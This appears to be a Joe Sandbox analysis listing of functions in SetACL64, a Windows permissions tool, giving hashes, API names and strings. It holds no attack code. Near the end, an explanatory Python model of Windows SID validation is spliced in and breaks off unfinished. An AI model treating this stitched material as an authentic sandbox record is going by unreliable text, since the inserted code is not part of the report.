                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                  • String ID: AddDomain$No domain specified.
                                                  • API String ID: 3668304517-2536513783
                                                  • Opcode ID: 99e0925a6b9fdd9a5b0408bba0820a297a0d0a02d1bb6155b4d59c8334b4e1bd
                                                  • Instruction ID: 55fe2b50eb823f61a816eafcc6fb1ac2f4d25cf078eacb59675a9f10a29598f7
                                                  • Opcode Fuzzy Hash: 99e0925a6b9fdd9a5b0408bba0820a297a0d0a02d1bb6155b4d59c8334b4e1bd
                                                  • Instruction Fuzzy Hash: 4451A372A5968691EB00AF6AE4883ADA322FB49764FC04531D74C039EBDFFCE191C710
Memory Dump Source
• Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
• Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$QueryValue$DefaultLangUser
                                                  • String ID: \StringFileInfo\%04X04B0\%s$\StringFileInfo\%04x%04x\%s$\VarFileInfo\Translation
                                                  • API String ID: 124864902-1470331934
                                                  • Opcode ID: 84a91a20877e75cd1db0540d89d5f8e58374f05ff5f461cff2050a2cec5ccb81
                                                  • Instruction ID: 421e474c93a9d9875181602c6c40b04230936b45dc19c26634a9de2dc3acf1d3
                                                  • Opcode Fuzzy Hash: 84a91a20877e75cd1db0540d89d5f8e58374f05ff5f461cff2050a2cec5ccb81
                                                  • Instruction Fuzzy Hash: 85917632A18B4180EB00DF59E4402AEB771FB897F4F905135EA9D03AAADFBCE195C710
Memory Dump Source
• Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
• Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$GetctypeLocinfo::_Locinfo_ctor
                                                  • String ID: bad locale name
                                                  • API String ID: 249287498-1405518554
                                                  • Opcode ID: 8bc982661b0ee05dfb2898125f394b4b40cc44dd271d2c8eedadb7c000856f72
                                                  • Instruction ID: 8c13aebadedfb7450be25dd8ffba23062579612050c59f733781830f9930f6a9
                                                  • Opcode Fuzzy Hash: 8bc982661b0ee05dfb2898125f394b4b40cc44dd271d2c8eedadb7c000856f72
                                                  • Instruction Fuzzy Hash: D171AE23B09A8189FF11EF62D4502BCA3A4EF987A4F950035DE4D23B57DE78E5529320
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
• Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7a5f5edd017b658e983cfd53b7e8145c4734415c703908048787467d75527855
                                                  • Instruction ID: f3040ae8ae12fe1df8235986b33032111db139c402d8fe40c87bd1b87188df1b
                                                  • Opcode Fuzzy Hash: 7a5f5edd017b658e983cfd53b7e8145c4734415c703908048787467d75527855
                                                  • Instruction Fuzzy Hash: D4B1BF72A15B8189EB14DF66E8807AC73A5FB48BACF904035EF8C07A5ADF78D591C350
Memory Dump Source
• Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
• Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$Valid$DeleteEqualInformation
                                                  • String ID:
                                                  • API String ID: 439278688-0
                                                  • Opcode ID: 02abaca1715827c988373279d1206fa39163a6e830349d42f3409750fdde2c61
                                                  • Instruction ID: feea9ad6e99f519772ba9738613a96c4f5d79952b72619a49a58ab1b820dc90b
                                                  • Opcode Fuzzy Hash: 02abaca1715827c988373279d1206fa39163a6e830349d42f3409750fdde2c61
                                                  • Instruction Fuzzy Hash: FB815D22A0C68682EB60AF279544379A7A0FF8DB64FC44535CA8D87786DFBCE551C720
Memory Dump Source
• Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
• Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Valid$Equal$CopyLength
                                                  • String ID:
                                                  • API String ID: 1685539899-0
                                                  • Opcode ID: 3b1f6e0476a15e4dbeff593321d0a39690655f45c3396d74e8fe94f401111051
                                                  • Instruction ID: 9113f38976875259ec1c862af1316e60dc1aa129d2bfbd9380b683084341d98e
                                                  • Opcode Fuzzy Hash: 3b1f6e0476a15e4dbeff593321d0a39690655f45c3396d74e8fe94f401111051
                                                  • Instruction Fuzzy Hash: BC616D22B0A64685EB55AF279654379A3E1BF89BE4FC90031DD4E47686EEACE440C320
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$Lockitstd::_$Lockit::_Lockit::~_Setgloballocalestd::locale::_
                                                  • String ID: \\?\$\\?\UNC\
                                                  • API String ID: 3857612545-3019864461
                                                  • Opcode ID: 80f86e82870b07e6d5627ecd3545ff3dece0f910a388d86736f9a77694643264
                                                  • Instruction ID: bfe764db86b1c08f87988f2966ce7228f70c01b1cd3a03c8fa32392653cd2ad7
                                                  • Opcode Fuzzy Hash: 80f86e82870b07e6d5627ecd3545ff3dece0f910a388d86736f9a77694643264
                                                  • Instruction Fuzzy Hash: 7312D372B14A51C4FF08AF66E4443ADA362BB4ABA8FA16135CE1D177DACFBCD4448350
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                  • String ID: AddTrustee$No trustee specified.
                                                  • API String ID: 3668304517-2850116058
                                                  • Opcode ID: fb94bdf829771a45d73d4169ee65a2f39625c9cf73fdf6b67dd04f57a629b6a1
                                                  • Instruction ID: d9f4019390d2f4c46ba8bd908713ea434f10f457af2e6d83c0a69bd80f6a2f7a
                                                  • Opcode Fuzzy Hash: fb94bdf829771a45d73d4169ee65a2f39625c9cf73fdf6b67dd04f57a629b6a1
                                                  • Instruction Fuzzy Hash: 60E19372B1878181EF04AF6AE4883ADA362FB497A4F904135D74C07AAADFBCD491C710
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Concurrency::cancel_current_task$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                  • String ID: false$true
                                                  • API String ID: 164343898-2658103896
                                                  • Opcode ID: f445c541dcabc8c76a2eb441bad9b69acf557a9bd182a87f89098410cebb741f
                                                  • Instruction ID: 6889783ac5fc2becc3aa69e150598e7e5604bd008174e069bc44f92971c80407
                                                  • Opcode Fuzzy Hash: f445c541dcabc8c76a2eb441bad9b69acf557a9bd182a87f89098410cebb741f
                                                  • Instruction Fuzzy Hash: 5CD1AB22B19B4289EB10EF62D4402EDB3A5EF4C7A8F864135DE4C67B8ADF78D516C350
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Valid$Equal$Length
                                                  • String ID: unordered_map/set too long
                                                  • API String ID: 2183326427-306623848
                                                  • Opcode ID: ad27f92fef91cd753ab91c311a8dad5f0718926ff1c6d6db717cf738553d2b84
                                                  • Instruction ID: f76280d2646cf0c6112072f446cca3d44189008960575b39eaeeeafd4ff9e974
                                                  • Opcode Fuzzy Hash: ad27f92fef91cd753ab91c311a8dad5f0718926ff1c6d6db717cf738553d2b84
                                                  • Instruction Fuzzy Hash: 85A1AE22A09B4682EB50EF13E4487B9A3A4FF4CB94F984635DE8D47752DF7CE4608B50
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$LoadString
                                                  • String ID: Operating system error message: $SetACL error message: $SetACL finished with error(s):
                                                  • API String ID: 498717675-3876775778
                                                  • Opcode ID: 5ce873107c147e58fbec8a04b54c5fd4bfe3e96f955e4566f1b3ca94a313b483
                                                  • Instruction ID: afdd5a752d12bc1daf07646c2e84a3abd955910958f16662f771c3a2debf063b
                                                  • Opcode Fuzzy Hash: 5ce873107c147e58fbec8a04b54c5fd4bfe3e96f955e4566f1b3ca94a313b483
                                                  • Instruction Fuzzy Hash: 7581C462A08BC689FB20AF36D8443ED6352FB59798FD08135D64C17A9BDFACD684C350
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_Locinfo_ctor
                                                  • String ID: bad locale name
                                                  • API String ID: 3718194943-1405518554
                                                  • Opcode ID: 1a7bf999381c07af3242a3cc31933243c0f84e1edb9a9b3fcdc9fb87e6ad8860
                                                  • Instruction ID: 0849a2c37a08c811f71f0adaab415e8717774aadec7b0b7e7088f0c213da54a5
                                                  • Opcode Fuzzy Hash: 1a7bf999381c07af3242a3cc31933243c0f84e1edb9a9b3fcdc9fb87e6ad8860
                                                  • Instruction Fuzzy Hash: 0761AE22B19A4189FB10FF62D4402FCB3A4EF987A8F990035DE4D53A56CEB8E521D324
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$ErrorLast$ComputerName
                                                  • String ID: GetComputerNameAPIWrapper$Querying the computer name failed with:
                                                  • API String ID: 3471954800-1594087890
                                                  • Opcode ID: 065ba2d2fcd18019d0079e83448bdb250b984e5464f0ba45951be90b2cb0b2c0
                                                  • Instruction ID: 734bf4d958dcb1f4b17e2f91e8c671321423a1afe857324a302b70680769e869
                                                  • Opcode Fuzzy Hash: 065ba2d2fcd18019d0079e83448bdb250b984e5464f0ba45951be90b2cb0b2c0
                                                  • Instruction Fuzzy Hash: 6551A822A1878241EB10AF26E4443ADA361EB8D7B4F915335EA5D43BDADFBCD094C710
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                                                  • String ID:
                                                  • API String ID: 1330151763-0
                                                  • Opcode ID: b9231ba523ef921c185656f1683b76f63ef61d7596155f01418a651d74091a53
                                                  • Instruction ID: 711763ee801cf1b19f78c56fec3d3ee3e489092a33708c84b4028919ee051178
                                                  • Opcode Fuzzy Hash: b9231ba523ef921c185656f1683b76f63ef61d7596155f01418a651d74091a53
                                                  • Instruction Fuzzy Hash: FAC1B232B18A4285EB10EF6AC4906AC7760FB49BA8F904335DE2E577D6CF78D461C710
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Valid_invalid_parameter_noinfo_noreturn$Equal
                                                  • String ID:
                                                  • API String ID: 2161274208-0
                                                  • Opcode ID: a5c13f6e99239f99eb93357bfcbca789068a21bedda29611b1cdf87a38f81f85
                                                  • Instruction ID: 0b78a94eb0db77e18f21a96b95c57bb20e99e8289aad4120fec31986e8159377
                                                  • Opcode Fuzzy Hash: a5c13f6e99239f99eb93357bfcbca789068a21bedda29611b1cdf87a38f81f85
                                                  • Instruction Fuzzy Hash: 2191BF62A09A4691EB24AF23D4443BEA361FB49BF4FD44131DA5D87B96DFBCE440C321
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Frame$BlockEstablisherHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchState
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 40297248-393685449
                                                  • Opcode ID: 01465d0ab2951ccdcd10f37ed96a7a8c97669fa495d3d06220a6bd79f10303bb
                                                  • Instruction ID: 38a88cacf2e437cb97eb7c5960e4be81a1f41461440a9c1ef239fd2e95f22b74
                                                  • Opcode Fuzzy Hash: 01465d0ab2951ccdcd10f37ed96a7a8c97669fa495d3d06220a6bd79f10303bb
                                                  • Instruction Fuzzy Hash: 95D1C732A08B41C6EB20EF26D4402ADB7A0FB4D7A8F544135EE8D57B56CF78E491CB11
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Time$File$System$Local$Specific_invalid_parameter_noinfo_noreturn
                                                  • String ID: %04d-%02d-%02d %02d:%02d:%02d.%03d %s%02d%02d$-
                                                  • API String ID: 1697026759-531884627
                                                  • Opcode ID: c8f77f1d47166479bcfb340e38561e243565818e0dfa4d9be323b608fca60165
                                                  • Instruction ID: 32ab58d3bedea35a6c60edec11a13b9676dfa9f90269982f0f0da930f2ce0018
                                                  • Opcode Fuzzy Hash: c8f77f1d47166479bcfb340e38561e243565818e0dfa4d9be323b608fca60165
                                                  • Instruction Fuzzy Hash: E4D16D32618B8186EB20EF56F4802AEB7A5FB89794F904136EA8D43B59DF7CD544CB10
                                                  APIs
                                                    • Part of subcall function 00007FF7C17408C0: IsValidSid.ADVAPI32(?,?,?,00007FF7C174034D,?,?,?,?,?,00007FF7C173F8CF), ref: 00007FF7C17408E2
                                                    • Part of subcall function 00007FF7C17408C0: GetLengthSid.ADVAPI32(?,?,?,00007FF7C174034D,?,?,?,?,?,00007FF7C173F8CF), ref: 00007FF7C17408F3
                                                  • IsValidSid.ADVAPI32(?,?,?,?,?,?,00007FF7C1740516,?,?,?,?,?,00007FF7C173F8CF), ref: 00007FF7C1740789
                                                  • IsValidSid.ADVAPI32(?,?,?,?,?,?,00007FF7C1740516,?,?,?,?,?,00007FF7C173F8CF), ref: 00007FF7C174079C
                                                  • EqualSid.ADVAPI32(?,?,?,?,?,?,00007FF7C1740516,?,?,?,?,?,00007FF7C173F8CF), ref: 00007FF7C17407AE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Valid$EqualLength
                                                  • String ID: invalid hash bucket count
                                                  • API String ID: 2688289545-1101463472
                                                  • Opcode ID: 215e4837fbac5d1038da7360346adbacd6a27b358d3f20a4aea1ad4a7b7f4b8a
                                                  • Instruction ID: 41bc424ddd25dc0ec5932791411f96eedf9376d2d9af3572d681ebd99f8cd759
                                                  • Opcode Fuzzy Hash: 215e4837fbac5d1038da7360346adbacd6a27b358d3f20a4aea1ad4a7b7f4b8a
                                                  • Instruction Fuzzy Hash: 9E515936709B81C2EB54EF12E54416DB3A8FB48BE0B458436CB9D43B95DF78E464C760
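The API list for this function (IsValidSid on each SID, then EqualSid, with a subcall that pairs IsValidSid and GetLengthSid) is the standard validate-then-compare sequence for two security identifiers. The following is an added, offline model of that sequence in pure Python; it is not code from SetACL, from the sample, or from the sandbox report. It mirrors the documented binary SID layout (Revision, SubAuthorityCount, a 6-byte big-endian IdentifierAuthority, then SubAuthorityCount little-endian 32-bit sub-authorities), and the sample SIDs and the names `build_sid`, `compare_trustees` and `TRUNCATED` are constructed for illustration. The behaviour on a truncated buffer is this model's own check, not something the Win32 API guarantees.

```python
"""Pure-Python model of the Win32 SID checks IsValidSid, GetLengthSid and EqualSid.

Constructed example for readers of the SetACL64 function listing; not code from
SetACL, the analysed sample, or Joe Sandbox.  It follows the documented SID
binary layout so the validate/validate/compare pattern can be run on raw bytes.
"""
import struct

SID_REVISION = 1
SID_MAX_SUB_AUTHORITIES = 15
SID_HEADER_LEN = 8  # Revision (1) + SubAuthorityCount (1) + IdentifierAuthority (6)


def get_length_sid(sid: bytes) -> int:
    """Like GetLengthSid: the length implied by the SubAuthorityCount byte."""
    if len(sid) < 2:
        raise ValueError("buffer too short to hold a SID header")
    return SID_HEADER_LEN + 4 * sid[1]


def is_valid_sid(sid: bytes) -> bool:
    """Like IsValidSid: Revision must be 1 and SubAuthorityCount <= 15.

    This model additionally requires the buffer to hold the implied number of
    bytes, because a raw byte string (unlike a Windows-allocated SID) may be
    truncated; that extra check is an assumption of this example.
    """
    if len(sid) < 2:
        return False
    if sid[0] != SID_REVISION or sid[1] > SID_MAX_SUB_AUTHORITIES:
        return False
    return len(sid) >= get_length_sid(sid)


def equal_sid(a: bytes, b: bytes) -> bool:
    """Like EqualSid on two valid SIDs: equal if their GetLengthSid-sized
    prefixes are byte-identical (trailing buffer slack is ignored).
    EqualSid's result on an invalid SID is undefined; this model returns False.
    """
    if not (is_valid_sid(a) and is_valid_sid(b)):
        return False
    la, lb = get_length_sid(a), get_length_sid(b)
    return la == lb and a[:la] == b[:lb]


def sid_to_string(sid: bytes) -> str:
    """Render a valid binary SID in the usual S-1-5-... form."""
    if not is_valid_sid(sid):
        raise ValueError("invalid SID")
    count = sid[1]
    authority = int.from_bytes(sid[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, sid, SID_HEADER_LEN)
    return "S-%d-%d" % (sid[0], authority) + "".join("-%d" % s for s in subs)


def build_sid(authority: int, *subs: int) -> bytes:
    """Constructed helper to assemble test SIDs from an authority and sub-authorities."""
    return (bytes([SID_REVISION, len(subs)])
            + authority.to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))


def compare_trustees(a: bytes, b: bytes) -> str:
    """The validate / validate / compare sequence from the listing as one call."""
    if not is_valid_sid(a) or not is_valid_sid(b):
        return "invalid"
    return "same" if equal_sid(a, b) else "different"


# Constructed sample SIDs (well-known values, not taken from the report).
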